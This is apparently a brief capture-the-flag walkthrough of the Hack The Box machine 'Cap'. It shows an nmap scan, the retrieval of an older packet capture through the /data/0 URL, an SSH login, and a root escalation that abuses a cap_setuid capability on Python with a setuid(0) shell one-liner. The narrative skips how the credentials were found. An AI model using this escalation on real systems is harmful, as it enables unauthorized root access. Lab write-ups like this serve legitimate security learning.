neoh main ~/HTB/cap sudo nmap 10.10.10.245 -sSCV -p- -T4 -oN nmap.md [sudo] password for neoh: Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 16:03 EST Nmap scan report for 10.10.10.245 Host is up (0.026s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn | fingerprint-strings: [...] Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 140.57 seconds
Nmap reveals FTP, SSH and HTTP. I couldn’t log successfully on FTP so went to the website.
The pcap had nothing really interesting. Going back to the website and looking at the URL http://10.10.10.245/data/1 I wondered what was at /data/0. It seems like an older report. I downloaded it.
neoh main ~/HTB/validation ssh [email protected] The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established. ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.245' (ECDSA) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sun Nov 14 21:13:58 UTC 2021 System load: 0.19 Processes: 255 Usage of /: 36.6% of 8.73GB Users logged in: 0 Memory usage: 20% IPv4 address for eth0: 10.10.10.245 Swap usage: 0% * Super-optimized for small spaces - read how we shrank the memory footprint of MicroK8s to make it the smallest full K8s around. https://ubuntu.com/blog/microk8s-memory-optimisation 63 updates can be applied immediately. 42 of these updates are standard security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Thu May 27 11:21:27 2021 from 10.10.14.7 [email protected]:~$ sudo -l [sudo] password for nathan: Sorry, user nathan may not run sudo on cap.
After a couple minutes of enumeration, I found out something nice.
[email protected]:~$ getcap -r / 2>/dev/null /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip /usr/bin/ping = cap_net_raw+ep /usr/bin/traceroute6.iputils = cap_net_raw+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep [email protected]:~$ python -c 'import os; os.setuid(0); os.system("/bin/sh")'
We can use python to gain capabilities with suid.
[email protected]:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' # whoami root